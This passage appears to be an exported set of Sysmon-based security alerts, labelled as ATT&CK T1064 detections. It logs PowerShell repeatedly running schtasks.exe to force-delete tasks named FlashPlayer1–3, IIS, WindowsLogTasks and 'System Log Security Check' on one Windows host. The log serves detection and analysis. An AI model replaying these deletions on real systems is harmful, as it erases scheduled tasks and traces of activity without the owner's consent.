-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.415",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.384 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00107b092700} +ProcessId: 4692 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.387679300Z"",""eventRecordID"":""3058"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.384\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00107b092700}\r\nProcessId: 4692\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.384"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00107b092700}"",""processId"":""4692"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.400",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.334 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00105f032700} +ProcessId: 3780 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating 
System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.337607500Z"",""eventRecordID"":""3057"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.334\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00105f032700}\r\nProcessId: 3780\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.334"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00105f032700}"",""processId"":""3780"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.385",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:51:01.286 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010aefd2600} +ProcessId: 6948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.289246700Z"",""eventRecordID"":""3056"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.286\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010aefd2600}\r\nProcessId: 6948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.286"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010aefd2600}"",""processId"":""6948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.369",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.252 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ebfb2600} +ProcessId: 4912 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.256462400Z"",""eventRecordID"":""3055"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.252\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ebfb2600}\r\nProcessId: 4912\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.252"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010ebfb2600}"",""processId"":""4912"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.339",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.082 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001009fa2600} +ProcessId: 2128 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.102288700Z"",""eventRecordID"":""3054"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.082\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001009fa2600}\r\nProcessId: 2128\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:01.082"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-001009fa2600}"",""processId"":""2128"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.322",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.956 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001035f82600} +ProcessId: 7648 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.964486400Z"",""eventRecordID"":""3053"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.956\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001035f82600}\r\nProcessId: 7648\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.956"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001035f82600}"",""processId"":""7648"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.684",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.862 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010eff22600} +ProcessId: 1552 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: 